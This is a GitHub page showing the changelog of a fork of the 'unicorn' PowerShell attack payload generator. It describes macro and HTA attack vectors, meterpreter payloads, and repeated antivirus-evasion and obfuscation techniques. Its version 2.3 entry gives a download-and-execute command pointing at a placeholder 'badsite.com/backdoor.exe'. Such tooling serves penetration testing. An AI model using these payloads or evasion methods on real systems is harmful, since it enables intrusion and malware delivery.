forked from trustedsec/unicorn
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCHANGELOG.txt
213 lines (154 loc) · 6.16 KB
/
CHANGELOG.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
~~~~~~~~~~~~~~~~
verison 2.7.2
~~~~~~~~~~~~~~~~
* random cleanup
~~~~~~~~~~~~~~~~
version 2.7.1
~~~~~~~~~~~~~~~~
* fixed merge issue
~~~~~~~~~~~~~~~~
version 2.7
~~~~~~~~~~~~~~~~
* added description to macro attack for AutoOpen/Auto_Open()
* added obfuscation for actual base64 encoded strings
* added better randomization on variable names
~~~~~~~~~~~~~~~~
version 2.6
~~~~~~~~~~~~~~~~
* fixed an issue when generating hta if a folder was there it would not remove properly and overwrite
* fixed a bug introduced by new obfuscation on proper escaping of quotes
* added new obfuscation around HTA, variable names and split up shell commands to evade detection
* improved code base for HTA attack vector and reliability
~~~~~~~~~~~~~~~~
version 2.5.1
~~~~~~~~~~~~~~~~
* minor string format cleanup
* pep8 formatting
~~~~~~~~~~~~~~~~
version 2.5
~~~~~~~~~~~~~~~~
* complete rehaul on macro injection - adds heavy obfsucation through the entire codebase
* changed generate_random_strings to remove any digits - this was due to macro strings not supporting numeric values.startswith()
* code improvements and efficiency in vba code
~~~~~~~~~~~~~~~~
version 2.4.3
~~~~~~~~~~~~~~~~
* fixed macro injection with new obfuscated method
* added noprofile to command when using macro injection
* changed AutoOpen to Auto_Open
* fixed instructions to reflect
~~~~~~~~~~~~~~~~
version 2.4.2
~~~~~~~~~~~~~~~~
* added shortened version of -window hidden to -w 1 which is shorthand for window hidden
~~~~~~~~~~~~~~~~
version 2.4.1
~~~~~~~~~~~~~~~~
* added shortened method for obfsucation
~~~~~~~~~~~~~~~~
version 2.4
~~~~~~~~~~~~~~~~
* added better handling if msf or shellcode didn't get formatted properly
* added a new technique for obfsucation that should not get picked up anymore and removes the need for -e or -ec
~~~~~~~~~~~~~~~~
version 2.3.5
~~~~~~~~~~~~~~~~
* added better evasion on encodedcommand
~~~~~~~~~~~~~~~~
version 2.3.4
~~~~~~~~~~~~~~~~
* added decoded base64 -encodedcommand for better av evasion
~~~~~~~~~~~~~~~~
version 2.3.3
~~~~~~~~~~~~~~~~
* most AVs were flagging on -enc instead of -EncodedCommand along with base64 would flag windows defender.. looks like this gets around it on both macro and standard ps1/encoded command params.
~~~~~~~~~~~~~~~~
version 2.3.2
~~~~~~~~~~~~~~~~
* change auto_open to autopen() - thanks @JAshton
~~~~~~~~~~~~~~~~
version 2.3.1
~~~~~~~~~~~~~~~~
* fix indent issue
~~~~~~~~~~~~~~~~
version 2.3
~~~~~~~~~~~~~~~~
* added support for windows/download_exec as a payload option - just run python unicorn.py windows/download_exec exe=exename.exe url=http://badsite.com/backdoor.exe - note it doesn't need to be an exe, whatever you want to download and execute
* fixes an issue that caused macro injection to not properly work (duplicate powershell command)
~~~~~~~~~~~~~~~~
version 2.2
~~~~~~~~~~~~~~~~
* pep8 formatting
* python3 conversion
* added randomized variables (not fully completed yet but its better than before) - AV picking up on variables and base64 encoded strings
~~~~~~~~~~~~~~~~
version 2.1.2
~~~~~~~~~~~~~~~~
* added enablestageencoding to true by default
~~~~~~~~~~~~~~~~
version 2.1.1
~~~~~~~~~~~~~~~~
* added --smallest flag to msfvenom generate which compacts shellcode to smaller size
~~~~~~~~~~~~~~~~
version 2.1
~~~~~~~~~~~~~~~~
* added ability to import your own powershell into attacks (thanks to curi0usJack pull request)
* fixed an issue when generating macro attack with appropriate spacing on macros
~~~~~~~~~~~~~~~~
version 2.0
~~~~~~~~~~~~~~~~
* added brand new hta attack vector for direct web application compromise (thanks Justin Elze)
* added brand new attack binary to cert (thanks Matthew Graeber)
* added window.close(); after script
~~~~~~~~~~~~~~~~
version 1.3
~~~~~~~~~~~~~~~~
* slimmed down powershell injection code even more
* when using windows/meterpreter/reverse_https, the option flags StagerURILength=5 StagerVerifySSLCert=false are specified in order to trim down payload. This is due to char restriction sizes when pasting into a command window. With these two settings, the codebase is slimmed down significantly and fits within the normal length
* added support for shikata ga nai to obfuscate shellcode prior to utf and b64encoding. Will now through off sigs if contained inside of a file.
~~~~~~~~~~~~~~~~
version 1.2
~~~~~~~~~~~~~~~~
* fixed an issue where powershell injection may not work on 32 bit platforms
* shaved command line argument down around 32 bytes
~~~~~~~~~~~~~~~~
version 1.1
~~~~~~~~~~~~~~~~
* fixed autoopen from not working on some office implementations - now works on all office documents including powerpoint/word/excel
* changed the open description to fix a typo and also make it more believable
* fixed spacing issues when generating macro attack
* added instructions on when using macro on how to add the macro to an office document
* added better description and instructions for powershell injection
* added better description on initial loading of payload
~~~~~~~~~~~~~~~~
version 1.0
~~~~~~~~~~~~~~~~
* incorporated new macro attack from Rik van Duijn RCX @rikduijn
* code cleanup and fixed an issue that would not present argument values when not formatted properly
* channeled stderr to subprocess.PIPE
* slimmed unicorn powershell injection code about 17 bytes to compact powershell injection
~~~~~~~~~~~~~~~~
version 0.5
~~~~~~~~~~~~~~~~
* fixed hidden window command when using powershell injection
~~~~~~~~~~~~~~~~
version 0.4
~~~~~~~~~~~~~~~~
* shortened powershell injection code by removing un-used code and shortening initial command names
* removed EnableStageEncoding - after testing extensively, this can produce unreliable results.
* fixed a bug that caused unicorn to not work properly due to changes with MSFVenom
* slimmed encoded powershell command, removed un-used else statement
~~~~~~~~~~~~~~~~
version 0.3
~~~~~~~~~~~~~~~~
* updated msfvenom to include format type and architecture to remove bug it would not generate appropriate shellcode
~~~~~~~~~~~~~~~~
version 0.2
~~~~~~~~~~~~~~~~
* changed output name
* added appropriate licensing
* slimmed the powershell code and added noprofile to downgrade process
~~~~~~~~~~~~~~~~
version 0.1
~~~~~~~~~~~~~~~~
* initial release of magic unicorn